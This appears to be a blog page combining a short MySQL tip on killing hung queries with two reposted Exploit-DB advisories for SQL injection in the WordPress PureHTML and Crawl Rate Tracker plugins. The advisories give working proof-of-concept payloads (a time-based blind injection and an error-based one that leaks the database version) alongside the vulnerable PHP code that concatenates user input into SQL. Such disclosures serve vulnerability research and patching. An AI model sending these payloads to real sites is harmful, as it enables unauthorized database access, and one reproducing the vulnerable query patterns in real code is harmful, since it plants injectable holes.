How to kill querys on Mysql Como killar querys no mysql

Standard
  1. Login to DB.
  2. run command show full processlist;
  3. Here you will get the process id with status and Query it self which causing the problem of hanging database.
  4. Now select the process id and run command KILL <pid>;
  5. Now that point you kill that process.

Sometime that is not enough to kill each process manually. So, for that we’ve to go with some sort of trick. here I go with that trick:

  1. Login to MySql
  2. run that query Select concat('KILL ',id,';') from information_schema.processlist where user='user';
  3. This will print all the process with KILL command.
  4. Copy all the query result, manipulate them and remove pipe | sign and paste all again into the query console. HIT ENTER. BooM its done.

WordPress PureHTML plugin

Standard


# Exploit Title: WordPress PureHTML plugin < = 1.0.0 SQL Injection Vulnerability # Date: 2011-08-31 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/pure-html.1.0.0.zip # Version: 1.0.0 (tested) # Note: magic_quotes has to be turned off --------------- PoC (POST data) --------------- http://www.site.com/wp-content/plugins/pure-html/alter.php PureHTMLNOnce=1&action=delete&id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

---------------
Vulnerable code
---------------
if(!isset($_POST['PureHTMLNOnce'])){
if ( !wp_verify_nonce( $_POST['PureHTMLNOnce'], plugin_basename(__FILE__) )) {header("location:".$refer);}
}
else{
...
if(isset($_POST['id'])){$id = $_POST['id'];}else{$id='0';}
...
$action = $_POST['action'];

#delete
if($action == "delete"){
$sql = "delete from ".$wpdb->prefix."pureHTML_functions WHERE id='".$id."'";
$wpdb->query($wpdb->prepare($sql)); //misusage of $wpdb->prepare() :)

Fonte: http://www.exploit-db.com/exploits/17758/

WordPress Crawl Rate Tracker plugin

Standard


# Exploit Title: WordPress Crawl Rate Tracker plugin < = 2.0.2 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/crawlrate-tracker.2.02.zip # Version: 2.0.2 (tested) # Note: magic_quotes has to be turned off --- PoC --- http://www.site.com/wp-content/plugins/crawlrate-tracker/sbtracking-chart-data.php?chart_data=1&page_url=-1' AND EXTRACTVALUE(1, CONCAT(CHAR(58),@@version,CHAR(58)))--%20 --------------- Vulnerable code --------------- class b3_chartData extends b3_sbTrackingConfig { public function tracking_bot_report_chart_data() { ... if($_GET['page_url'] != '') { $bots = $this->wpdb->get_results("SELECT DATE(FROM_UNIXTIME(`visit_time`)) `visit_date`,`robot_name`,COUNT(*) `total` FROM $this->sbtracking_table WHERE `visit_time` >= '$start' AND `visit_time` < = '$end' AND `page_url` = '" . $_GET['page_url'] . "' GROUP BY `visit_date`,`robot_name`"); ... if ($_GET['chart_data']==1) { ... $chartData = new b3_chartData(); echo $chartData->tracking_bot_report_chart_data();

Fonte: http://www.exploit-db.com/exploits/17755/